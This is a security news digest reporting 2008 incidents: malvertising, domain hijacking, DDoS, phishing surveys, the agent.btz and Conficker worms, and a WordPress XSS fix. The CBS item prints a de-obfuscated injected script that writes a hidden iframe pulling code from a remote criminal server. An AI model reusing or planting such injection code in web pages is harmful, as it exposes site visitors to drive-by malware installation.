CyberInsecure.com

Advertising Network Serves Malicious Ads, Daily Mail Website Readers Redirected To Malware Installing Server

Accordging to SophosLabs, an advertising network used by the Daily Mail website is being used to serve up malware. A strain of the Mario family of worms was being offered by an Israeli advertising network used by the Daily Mail.

The tainted ads are the work of malicious hackers who somehow succeeded in injecting redirection scripts into the ad network. Code injected into an advertising stream is being used to serve up content for a malware-harbouring website located in Russia. This site uses vulnerabilities in browser software to download malicious code onto unpatched Windows PCs, a classic drive-by-download attack.

Analysis of the attack is ongoing and it’s not clear what other sites, who also use Eyeblaster, the affected ad serving network, might be affected.

Sophos investigation revealed suspicious behavior when at the beginning Internet Explorer loads its default homepage and then access the affected webpage. After half a dozen refreshes it attempted to connect to http://77.221.133.xxx, IP known for hosting malware in the past. Further investigation shows that the site anm.co.uk was hosting the malicious code and legitimate adverts.

Doing a WHOIS lookup on this IP shows its hosted in Russia. Recently, Sophos has seen IPs in this network range associated with W32/MarioF-Gen.

Daily Mail has been informed of the attack but it’s unclear how far Associated Newspaper technicians have gone in blocking the attack.

CheckFree Online Payment Site Hijacked By Criminals, Users Redirected To Rogue Server

Online payment service CheckFree lost control of at least two of its domains on Tuesday in an attack that sent customers to servers run by cybercriminals from Eastern Europe.

The Register reports about a reader who received a bogus secure sockets layer certificate when attempted to log in to his Mycheckfree.com account early Tuesday morning. On further examination, he discovered the site was mapping to 91.203.92.63. To confirm the redirection was an internet-wide problem, he checked the site using a server in another part of the US and got the same result. Commercial customer support tech was not aware of any problem.

Security experts say the 91.203.92.63 IP address has long served as a conduit for online crime. According to security researcher Paul Ferguson of anti-virus software provider Trend Micro, the IP address was recently observed handing off booby-trapped PDF files that infected those unfortunate enough to open them.

According to bfk.de, Spamhaus, and SpyNoMore, several other web addresses are also being redirected to that IP address, including phgainc.org, brachetti.com, and camouflageclothingonline.net.

It’s unclear how long checkfree.com and mycheckfree.com were redirected to the rogue servers or whether customers have been warned they may have been compromised.

It’s also unclear how the culprits managed to hijack the domains. While security experts say DNS poisoning wasn’t out of the question, the more likely explanation is malicious transfer of the domains through their registrar. Indeed, whois records for both the addresses indicate they were updated sometime Tuesday.

Credit: The Register

AlertPay.com Hit By A Massive DDoS Attack, Outage Took A Day To Resolve

Millions of account holders at privately owned online payment gateway, AlertPay.com, weren’t able to do business through the service yesterday. According to a notice left by a company representative, AlertPay was under a large scale DDoS attack.

Seven hours of downtime right in the middle of the Christmas shopping season with millions of businesses using the service affected, isn’t coincidental. This DDoS attack, just like the recent DDoS attack again a popular anti-fraud site, may have well been outsourced.

AlertPay’s statement on the situation posted yesterday states:

We are currently experiencing a large scale DDOS attack that has hit our sites which started at approximately 6:00am EST Sunday. We are working with our data center to resolve and/or mitigate this issue. More information will be posted here as we get updates. For the time being customers can connect to AlertPay at an alternate location: https://67.205.87.226

Several hours later, AlertPay issued an update:

We have finally mitigated the massive DDOS attack that started at 6:00am EST. Unfortunately it took almost all day to resolve. The site is operational now, and hopefully we’ll continue to tweak it more tomorrow to ensure this doesn’t happen again. We sincerely apologize for the inconvenience and we understand that this outage affects each of you personally. We’re sorry for that. We will continue to put measures in place so that outages like this do not occur again.

It is unclear who exactly is behind this DDoS attack. It might be an unethical competition which in times of international economic meltdown can easily restore its market position by damaging the reputation and reliability of known competitor. It could also be cybercriminals who got a reason to damage a particular online payment processor that has, for example, detected their fraudulent activity, thereby causing them huge monetary losses.

Despite the fact that online payment gateways have always been targets for DDoS extortionists, with malicious attackers introducing DDoS services for hire, they have empowered literally everyone knowing how to contact them with the opportunity to forward the responsibility for an attack to a third-party.

AlertPay is not the first payment gateway who got hit by a DDoS during the last couple of years. In 2004 four large online payment processors got hit: Worldpay, Authorize, Authorize-It and 2Checkout. In 2006 - StormPay, in 2008 - LibertyReserve.

Scammers Spam Lures Into Fake McDonald’s Survey With A Non-existent Money Reward

Phishing fraudsters are attempting to scam deceivable users into handing over their credit card details on the basis of a supposed offer from McDonalds.

The scam relies on spam emails to trick users into answering a fictitious satisfaction survey that offer a non-existent reward of $75. After completing the quiz prospective marks are asked to hand over their banking details in order to receive their reward. It includes name, email address, credit card details. Crooks will doubtless go on to either use this information to fraudulently buy goods or, more likely, sell it to others in the digital underground.

This isn’t the first time a bogus survey has used in a phishing attack. Surveys related to Wal-Mart, American Airlines, and even U.S. President-Elect Barack Obama were previously used to collect personal information from potential victims.

Also, similar to this phishing attack on McDonald’s, all surveys promised some form of reward to anyone who will participate on the survey. This clearly shows that cyber criminals are taking advantage of users’ tendency to try and save up as much money as they can, especially this holiday season.

Military US Base Systems In Afghanistan And Iraq Hit By A Virus, At Least One Classified Network Penetrated

The ‘malware’ strike, thought to be from inside Russia, hit combat zone computers and the U.S. Central Command overseeing Iraq and Afghanistan. According to a report from Washington, the incursion posed unusual concern among commanders and raised potential implications for national security.

Defense officials would not describe the extent of damage inflicted on military networks. But they said that the attack struck hard at networks within U.S. Central Command, the headquarters that oversees U.S. involvement in Iraq and Afghanistan, and affected computers in combat zones. The attack also penetrated at least one highly protected classified network.

Military computers are regularly beset by outside hackers, computer viruses and worms. But defense officials said the most recent attack involved an intrusive piece of malicious software, or “malware,” apparently designed specifically to target military networks. The invasive software, known as agent.btz, has circulated among nongovernmental U.S. computers for months. But only recently has it affected the Pentagon’s networks. It is not clear whether the version responsible for the cyber-intrusion of classified networks is the same as the one affecting other computer systems.

The malware is able to spread to any flash drive plugged into an infected computer. The risk of spreading the malware to other networks prompted the military to ban the drives.

Although officials are withholding many details, the attack underscores the increasing danger and potential significance of computer warfare, which defense experts say could one day be used by combatants to undermine even a militarily superior adversary.

Military electronics experts have not pinpointed the source or motive of the attack and could not say whether the destructive program was created by an individual hacker or whether the Russian government may have had some involvement. Defense experts may never be able to answer such questions, officials said.

Suspicions of Russian involvement come at an especially delicate time because of sagging relations between Washington and Moscow and growing tension over U.S. plans to develop a missile defense system in Eastern Europe. The two governments also have traded charges of regional meddling after U.S. support for democratic elections in former Soviet states and recent Russian overtures in Latin America.

The offending program has been cleansed from a number of military networks. But officials said they did not believe they had removed every bit of infection from all Defense Department computers.

Paypal Is Being Used In Popular Nigerian 419 Scam

A new variant of popular Nigerian 419 scam is possible via Paypal, according to report by Inquirer. The 419 scam is named after the relevant section of the Nigerian Criminal Code and the premise is always the same. Somebody offers to pay money into your account and give you a cut when you send it back. In truth the whole thing is money laundering but this latest twist – using Paypal – is significant because, on the surface, it looks like there’s no catch.

Instead of receiving the offer via email (as is normally the case), this person was approached over a Skype chat session. The perpetuator wants to transfer funds out a Paypal account and convert them back into US dollars. All the victim needed to do was check his Paypal account and when the money arrived, send a significantly lower amount back via Western Union.

Due to Paypal’s payment reversal policy, there is a loophole which enables the scam to work. As the payment would be classified as ’services’ rather than goods, there would be no proof that the the victim – who becomes the ‘vendor’ – provided any goods. So the ‘buyer’ – in this case the scammer – gets the money back. In the meantime, the vendor has sent the dollars via Western Union and then finds himself stuck with no means of recourse.

Both Western Union and Paypal can be blamed for making this scam work. Western Union makes it too easy to send and receive money anonymously while Paypal’s dispute resolution procedure system is a crude automated system.

Infecting Christmas E-greetings Are Distributed Via Spam

Websense Security Labs has discovered that malware authors are already using Christmas themes this year as a social engineering tactic, in an effort to gain control over compromised machines. This campaign uses email messages in the form of e-greetings, leading to supposed animated postcards. These actually lead to a Trojan backdoor that has been distributed in previous malicious spam campaigns.

The email messages, spoofed to appear as though they have been sent from postcards.org, display an animated Christmas scene. A URL link within the email leads to a malicious file called postcard.exe hosted on various servers, including those in the .com domain space.

Once executed, a backdoor is created by the malware author enabling access and control over the resources of the compromised machine. Control is conducted over IRC, communicating with ircserver.*snip*.la. During the install process an image called xmas.jpg is displayed to the user as a distraction technique.

Example of malicious email:

CBS.com Subdomain Compromised, Installing Malware On Visitors PC’s

Once again legitimate website was infected with malicious obfuscated code, this time it was CBS.com. It seems popular sites with very high traffic remain a favorite and highly effective attack vector for hackers.

Today Finjan has revealed that the subdomain of a famous radio and television network, etix.cbs.com, was compromised as a result of malicious activity. The cybercriminals added a malicious obfuscated script to the infected page. The injected script added a malicious IFrame to the page.

The injected IFrame automatically loads another malicious script from a remote server controlled by criminals in Russia, causing a possible installation of malware on the unsuspecting client machine. De-obfuscated script code from cbs.com sub-domain:

<SCRIPT> window.status=’Done’; document.write(’<iframe name=29dee5c6 src=\’http://[REMOVED]/.if/go.html?’ +Math.round(Math.random()*257224)+’3e78\’ width=632 height=407 style=\’display: none\’></iframe>’) </SCRIPT>

The malicious Russian server, from which the IFrame pulled the malicious code located in Saint Petersburg, hosted by “ZAO National Telecomunications ISP”.

Finjan immediately informed CBS.com of the infection and currently the remote Russian server is down.

Another Worm Exploiting MS08-067 Windows Flaw Spotted In The Wild

Microsoft’s Security Response Center and McAfee are warning on increased network scanning activity during the last couple of days courtesy of the very latest W32/Conficker.worm exploiting the already patched MS08-067 vulnerability. After last month’s ruckus made by Microsoft’s out-of-band patch, another threat leveraging the MS08-067 vulnerability was recently reported to have been causing more trouble in the wild.

What’s particularly interesting in the latest wave of copycat worms is that W32/Conficker.worm is patching the infected host in order to ensure that competing malicious parties wouldn’t be able to get in using it.

This malware mostly spreads within corporations but also was reported by several hundred home users. It opens a random port between port 1024 and 10000 and acts like a web server. It propagates to random computers on the network by exploiting MS08-067. Once the remote computer is exploited, that computer will download a copy of the worm via HTTP using the random port opened by the worm. The worm often uses a .JPG extension when copied over and then it is saved to the local system folder as a random named dll.

At McAfee Avert Labs they have also seen a few proof-of-concept binaries using the exploit code that was released into the wild to attack this Windows Server Service vulnerability; the latest is W32/Conficker.worm. According to the description in their Virus Information Library, W32/Conficker.worm decides how it will load itself as a Windows Service depending on whether the compromised version of Windows is Windows 2000. Once loaded in the service space, the worm attempts to download files from the Internet–specifically, further malware from trafficconverter.biz and data files from maxmind.com.

The public release of the proof of concept code in September, prompted an immediate reaction by international underground communities releasing several different modifications of the exploit, with the Chinese to be first to release a do-it-yourself tool allowing subnet scanning and automatic exposure to malware hosted on a third-party server.

XSS Flaw Fixed In Latest Wordpress 2.6.5

WordPress has fixed a cross-site scripting (XSS) flaw in its blogging software. The flaw only affects IP-based virtual servers running on Apache 2.x. Version 2.6.5 also addresses three unrelated performance and stability bugs with the open source package.

The first prevents accidentally saving post meta information to a revision. The second prevents XML-RPC from fetching incorrect post types. The third adds some user ID sanitization during bulk delete requests. For a list of changed files, consult the full changeset between 2.6.3 and 2.6.5.

In those setups it might be possible for hackers to rig systems so that they serve up malicious Java Script from domains under their control.

WordPress has jumped from version 2.6.3 to 2.6.5 of the software in order to avoid confusion with 2.6.4, a fake version recently offered up by black hats via a bogus site WordpresZ. Webmasters were directed to download the backdoor-rigged code earlier this month by hackers exploiting vulnerabilities in the blogging package. There is not and never will be an official 2.6.4 version.

If you are a Wordpress blog owner and interested only in the security fix, copy wp-includes/feed.php and wp-includes/version.php from the 2.6.5 release package.